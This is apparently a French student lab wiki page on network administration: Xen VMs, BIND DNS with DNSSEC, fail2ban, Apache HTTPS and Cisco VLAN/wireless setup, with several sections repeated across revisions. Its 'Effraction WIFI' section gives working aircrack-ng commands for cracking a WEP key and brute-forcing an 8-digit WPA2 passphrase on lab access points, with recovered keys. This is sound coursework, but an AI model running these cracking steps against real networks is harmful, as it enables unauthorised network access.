@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-12T14:58:32Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

=== Infos concernant notre binôme : ===
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') : <syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Sur capbreton ===
Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

=== Sur la machine de service ===
Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

== Configuration de la machine mandataire ==

<syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-11T14:35:21Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

=== Infos concernant notre binôme : ===
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

=== Introduction ===

=== Création du bridge ===
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

=== Création des machines virtuelles ===
Nous avons créé nos trois machines sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
